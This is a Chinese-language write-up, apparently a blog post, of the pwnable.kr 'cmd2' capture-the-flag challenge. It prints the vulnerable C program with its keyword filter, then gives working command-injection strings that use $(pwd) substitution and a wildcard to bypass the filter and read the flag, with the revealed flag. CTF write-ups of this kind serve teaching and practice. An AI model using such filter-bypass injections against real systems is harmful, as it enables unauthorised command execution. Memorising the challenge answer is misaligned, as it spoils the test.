Keep Calm and Carry On

pwnable-kr-cmd2

一、分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
#include <string.h>

// 更为严格的命令行参数的限制
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
// 环境变量都删除了,就是找不到要执行的程序的位置了
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}

二、思路

  1. $()可以将执行的结果插入到另一条命令中:

    1
    2
    drinkwater@ubuntu:/$ echo $(pwd)
    /
  2. 既然限制了/,那么可以在根目录下使用$(pwd)来代替/,就像上面展示的一样

    1
    2
    3
    4
    5
    6
    7
    /$ /home/cmd2/cmd2 "\$(pwd)bin\$(pwd)cat \$(pwd)home\$(pwd)cmd2\$(pwd)fla*"
    $(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla*
    flag{cmd2_cmd2_cmd2}

    drinkwater@ubuntu:/$ /home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla*'
    $(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)fla*
    flag{cmd2_cmd2_cmd2}

    可以使用这两种不同的方式,主要是单引号和双引号的问题,双引号的单引号的作用基本一致,都是可以解决字符串中的空格问题,但是单引号在遇到命令替换$()不会剥夺字符的特殊含义,而双引号就会剥夺其含义;如果要使用双引号则可以在$前转义一下。